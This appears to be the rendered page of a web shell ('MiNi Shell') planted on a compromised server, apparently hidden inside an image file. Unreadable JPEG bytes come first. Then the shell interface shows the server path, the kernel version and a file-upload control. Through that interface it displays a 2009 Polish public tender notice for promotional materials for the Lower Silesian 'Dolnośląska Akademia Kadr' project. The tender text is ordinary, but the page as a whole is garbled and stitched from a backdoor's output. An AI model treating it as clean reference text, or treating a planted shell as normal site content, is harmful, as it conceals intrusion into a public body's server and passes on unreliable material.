JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/110660-N-2009.html

<p class="kh_header"><b>Wrocław: Usługi przygotowania projektu graficznego, opracowania graficznego, wykonania i dostawy do siedziby Zamawiającego materiałów promujących w ramach projektu pt.: Dolnośląska Akademia Kadr</b><br>
<b>Numer ogłoszenia: 110660 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Dolnośląskie - Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 071 7769397,7769703-05,7779229, faks 071 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi przygotowania projektu graficznego, opracowania graficznego, wykonania i dostawy do siedziby Zamawiającego materiałów promujących w ramach projektu pt.: Dolnośląska Akademia Kadr.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi przygotowania projektu graficznego, opracowania graficznego, wykonania i dostawy do siedziby Zamawiającego materiałów promujących w ramach projektu pt.: Dolnośląska Akademia Kadr współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, tj.:

1.	Torba bawełniana:
.	materiał: bawełna, 
.	wymiary: 37,5 x 41 cm (plus-minus 3 cm),
.	kolorystyka: 50 czerwonych, 100 zielonych, 150 granatowych, 50 żółtych,
.	technika nadruku: nadruk jednostronny, tampodruk bezpośredni lub sitodruk bezpośredni, 
.	nadruk: loga w pełnej gamie kolorystycznej  na torbie,
.	uszy: długie 40 cm (plus-minus 2cm),
.	ilość: 350 szt.;
2.	Pendrive:
.	materiał: metal + tworzywo sztuczne lub aluminium,
.	pojemność: 1 GB,
.	technika nadruku: nadruk jednostronny, tampodruk bezpośredni lub sitodruk bezpośredni, 
.	nadruk:  loga w pełnej gamie kolorystycznej na pendrivie,
.	smycz w komplecie: bez nadruku, w kolorach: 50 granatowych, 100 czarnych, 
.	opakowanie: pudełko kartonowe bez nadruku na pendriva, smycz w woreczku,
.	ilość: 150 szt.;
3.	Torba na ramię z kieszenią z przodu:
.	materiał: poliester 600 D,
.	wymiary: 41 x 30 x 12 cm (plus-minus 5 cm),
.	opis wyposażenia: wewnątrz obszerne kieszenie z przegródkami na długopisy i telefon komórkowy, torba zapinana na zamek, uchwyt - rączka, regulowany pasek na ramię, zewnętrzna kieszonka na zamek, 
.	kolorystyka torby : 100 zielono - beżowych, 50 pomarańczowo - beżowych,
.	nadruk: loga w pełnej gamie kolorystycznej  na torbie,
.	technika nadruku: nadruk jednostronny, sitodruk bezpośredni,
.	ilość: 150 szt.;
4.	Długopis automatyczny: 
.	materiał: plastic,
.	opis: długopis plastikowy z automatycznym przyciskiem z satynowanym na kolor matowy korpusem, przyciskiem i końcówką, klipsem, posiadający kolorową wstawkę, wkład niebieski, wymienny grot niklowany,
.	technika nadruku: nadruk jednostronny, tampodruk wyłącznie na korpusie,
.	nadruk: loga w pełnej gamie kolorystycznej na długopisie, 
.	długość: nie mniej niż 13 cm, 
.	kolorystyka: 100 czerwonych, 100 niebieskich, 100 zielonych, 50 pomarańczowych, 
100 czarnych,
.	ilość: 450 szt.;
5.	Ołówek: 
.	opis: drewniany, zastrugany, zakończony gumką, lakierowany,
.	materiał: twarde drewno,
.	wymiary: długość 190 mm (plus-minus 20 mm),
.	wkład: grafit HB,
.	kolor: 100 czerwonych, 150 granatowych, 100 żółtych, 100 zielonych,
.	technika nadruku: nadruk jednostronny, tampodruk bezpośredni lub sitodruk bezpośredni,
.	nadruk: loga w pełnej gamie kolorystycznej  na ołówku,
.	ilość: 450 szt.; 
6.	Zestaw zakreślaczy  fluorescencyjnych - 4 sztuki w zestawie: 
.	wymiary: 35 x 112 x 28 mm (każdy zakreślacz, plus-minus 15 mm),
.	grubość linii pisania - 5,4 mm (plus-minus 1,5 mm),
.	cztery kolory: różowy, zielony, żółty, pomarańczowy, 
.	technika nadruku: nadruk jednostronny, tampodruk bezpośredni lub sitodruk bezpośredni, 
.	opakowanie z folii przeźroczystej, markery wkładane w paczkę po jednym kolorze z jednego rodzaju, 
.	nadruk: loga w pełnej gamie kolorystycznej na każdym zakreślaczu,
.	ilość: 450 zestawów;
7.	Parasol damski składany:
.	materiał: poliester 100%,
.	kolor: 100 granatowych, 50 beżowych,
.	długość szprych: 50 cm (plus-minus 5cm),
.	ilość szprych: 8,
.	średnica po rozłożeniu: ok. 90 cm, długość po złożeniu: ok. 30 cm,
.	rączka: metalizowana, kij aluminiowy,
.	stelaż: aluminiowy, końcówki z włókna szklanego, zakończone metalową nasadką z kulką, odporny na wiatr,
.	sposób otwierania: ręczny,
.	etui: nylon,
.	ilość: 150 szt.,
.	nadruk: loga w pełnej gamie  kolorystycznej;

8.	Zegar biurkowy wielofunkcyjny:
.	zegar, budzik, termometr, kalendarz,
.	materiał: metal/tworzywo sztuczne,
.	wymiary: 11 x 5, 5 x 2,8 cm (plus-minus 3 cm),
.	kolor: srebrny,
.	bateria w komplecie,
.	Iilść: 150 szt.,
.	grawer laserowy,
.	zapakowany w osobne pudełeczko (bez nadruku);
9.	Piłka antystresowa:
.	materiał: guma / tworzywo sztuczne,
.	kształt i kolor do uzgodnienia w trakcie realizacji umowy,
.	wymiary: 6,5 x 6,5 x 6,5 cm (plus-minus 2 cm),
.	ilość: 150 szt.,
.	tłoczenie na sucho;

10.	Notes A4:
.	materiał: okładka - papierowa, usztywniana, lakierowana, kreda matowa, nie mniej niż 150 g/m2, grzbiet - sprężynowy,
.	format i grubość: A4/30 kartek, 
.	kartki: w kratkę,  wyposażone w mikroperforację ułatwiającą ich wyrywanie,
.	papier: offsetowy nie mniej niż 80 g/m2,
.	kolorystyka: do uzgodnienia w trakcie realizacji umowy,
.	technika druku: nadruk jednostronny, 
.	nadruk: na okładce:  loga w pełnej gamie kolorystycznej, w środku loga czarno-białe,
.	ilość: 150 szt.;
11.	Notes A5:
.	materiał: okładka - papierowa, usztywniana, lakierowana, kreda matowa, nie mniej niż 150 g/m2, grzbiet - sprężynowy,
.	format i grubość: A5/30 kartek,
.	 kartki: w kratkę, wyposażone w mikroperforację ułatwiającą ich wyrywanie,
.	papier: offsetowy nie mniej niż 80 g/m2,
.	kolorystyka: do uzgodnienia w trakcie realizacji umowy,
.	technika druku: nadruk jednostronny,
.	nadruk na okładce: loga w pełnej gamie kolorystycznej, w środku  loga czarno-białe,
.	ilość: 350 szt.;
12.	Kostka z klipsem:
.	kostka z  plastiku z metalową klamrą oraz metalowym wysięgnikiem,
.	wymiar: 2,5 x 2,5 x 11 cm (plus-minus 2 cm),
.	kształt:  sześcian lub owal,
.	kolorystyka: do uzgodnienia w trakcie realizacji umowy,
.	technika nadruku: nadruk tampodruk bezpośredni lub sitodruk bezpośredni, 
.	nadruk: loga w pełnej gamie kolorystycznej na podstawie,
.	ilość: 450 szt.;
13.	Kubek termiczny z uchem w opakowaniu:
.	kubek ze stali nierdzewnej z plastikową, nakręcaną przykrywką,
.	wysokość: 17,3 cm (plus-minus 2 cm),
.	średnica kubka: 8,4 cm, kształt stożkowaty (plus-minus 2 cm),
.	pojemność: nie mniej niż 0,4 l,
.	technika nadruku: grawer,
.	nadruk: loga  na kubku,
.	ilość: 150 szt.;

Wykonawca przedstawi Zamawiającemu (w siedzibie Zamawiającego) w dniu podpisania umowy co najmniej 3 rodzaje każdego materiału promującego, z których Zamawiający wybierze jeden typ, który będzie przedmiotem realizacji umowy. Wykonawca jest zobowiązany przedstawić rodzaje oraz dostępne odcienie kolorystyczne poszczególnych materiałów promujących w dniu podpisania umowy. Zamawiającemu przysługują 2 dni robocze na wybór typu oraz ilości sztuk danego koloru materiału promującego.
Wykonawca zobowiązuje się umieścić na materiałach promujących loga zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki. Materiały do projektu graficznego zostaną przekazane Wykonawcy przez Zamawiającego w dniu podpisania umowy.
Wykonawca przy wyborze metody nadruku powinien kierować się kryterium jego trwałości. Zamawiający dopuszcza następujące techniki nadruku: tampodruk bezpośredni, sitodruk bezpośredni, grawer laserowy, nadruk jednostronny. 
Wymagany termin wykonania przedmiotu zamówienia - do 30 dni od dnia podpisania umowy.
Wszystkie koszty związane z pozyskaniem materiałów i usług niezbędnych do wykonania przedmiotu zamówienia ponosi Wykonawca.
Wykonawca zobowiązany jest do dostarczenia przedmiotu zamówienia do Urzędu Marszałkowskiego Województwa Dolnośląskiego. Wykonawca dostarczając przedmiot zamówienia ma obowiązek osobiście umieścić przedmiot zamówienia w pomieszczeniu wskazanym przez Zamawiającego, po uprzednim ustaleniu terminu i godziny dostawy oraz miejsca złożenia przedmiotu zamówienia z osobą wskazaną do kontaktu z Wykonawcą. 
Wszystkie materiały promujące będą objęte sześciomiesięczną gwarancją. Okres gwarancji jest liczony od daty przyjęcia materiałów promujących przez Zamawiającego. Gwarancja dotyczy trwałości materiału promującego oraz trwałości zastosowanego na nim nadruku. W czasie trwania gwarancji Zamawiający ma prawo żądać od Wykonawcy wymiany bądź naprawy wadliwych materiałów promujących. Wykonawca jest zobowiązany w ciągu 14 dni dostarczyć naprawiony bądź wymieniony materiał promujący. Przedłużenie terminu reklamacji w okresie trwania gwarancji jest możliwe tylko w uzasadnionych przypadkach oraz tylko za pisemną zgodą Dyrektora Wydziału Europejskiej Współpracy Terytorialnej Urzędu Marszałkowskiego Województwa Dolnośląskiego.
Podpisanie umowy odbędzie się w siedzibie Zamawiającego, w terminie wskazanym przez Zamawiającego.


Zamawiający nie dopuszcza możliwości składania ofert częściowych w zakresie elementów wyżej wymienionych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> V.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonania oceny spełniania tych warunków.
1.	O udzielenie niniejszego zamówienia mogą się ubiegać wykonawcy, którzy:
a)	posiadają uprawnienia niezbędne do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
 i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; tj. wykażą, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, zrealizowali co najmniej 1 usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia tzn. wykonanie i dostawa materiałów promujących 
o wartości minimum 20 tys. zł brutto każda;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 ust. 1 
i ust. 2.
2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez osoby wspólnie składające ofertę Zamawiający przyjmuje, że wymagania o których mowa w art. 22 ust. 1 pkt. 1-3  mogą spełniać tylko niektórzy z tych Wykonawców, tak by sumarycznie w odniesieniu do wszystkich tych Wykonawców były spełnione łącznie. Wymagania o których mowa w art. 22 ust. 1 pkt 4 musi spełnić każdy 
z Wykonawców.
3.	Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia 
w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych 
w rozdziale VI SIWZ. 
4.	Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.
5.	Zamawiający wzywa do uzupełnienia oświadczeń, pełnomocnictw lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu na zasadach określonych art. 26 ust.3 Ustawy Pzp.
6.	Nie spełnienie któregokolwiek z ww. warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI.	Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.

VI.1.Wykonawcy składają wraz z ofertą następujące dokumenty:
1.	 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku gdy wykonawcą jest podmiot zobowiązany do rejestracji 
w Krajowym Rejestrze Sądowym, a w załączonym odpisie z rejestru nie uwzględniono zmian 
w tekście dokumentu, Wykonawca dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia w sądzie rejestrowym ww. zmian.
2.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie 
art. 22 ust 1 pkt 1-4 (wzór oświadczenia stanowi Załącznik nr 2 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy mogą złożyć oświadczenie wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie) lub każdy z nich na odrębnym dokumencie.
3.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na wykonaniu usług określonych w rozdziale V pkt 1 lit. b, z podaniem ich przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie.  

VI.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa:
1) zamiast dokumentów, o których mowa w rozdz. VI. pkt 1 ppkt 1 SIWZ dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości, (powinny być wystawione nie wcześniej niż, 6 miesięcy przed upływem terminu składania ofert w postępowaniu 
o udzielenie zamówienia.);
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu lub dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty te powinny być wystawione w terminach określonych odpowiednio powyżej w pkt 1). 

Dokumenty są składane w formie oryginału lub kopii poświadczonej przez Wykonawcę za zgodność  z oryginałem. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

Pozostałe dokumenty z punktu VI Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej.

VI.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego
1.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub do reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
3.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana 
za najkorzystniejszą, przed zawarciem umowy o realizację zamówienia, są zobowiązani przedłożyć Zamawiającemu umowę regulującą współpracę tych Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie (umowę) zawierające w swojej treści co najmniej następujące postanowienia:
a)	zawiązania porozumienia co najmniej na czas nie krótszy niż czas trwania umowy,
b)	wskazanie Pełnomocnika,
c)	zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
d)	zakaz zmiany Partnerów (Wykonawców) wspólnie realizujących dane zamówienie publiczne w trakcie jego obowiązywania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.umwd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 09:30, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego
Wybrzeże J. Słowackiego 12 - 14, 
50 - 411 Wrocław
pok. nr 101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt: Dolnośląska Akademia Kadr,
program: Program Opreacyjny Kapitał Ludzki,

Creat By MiNi SheLL
Email: jattceo@gmail.com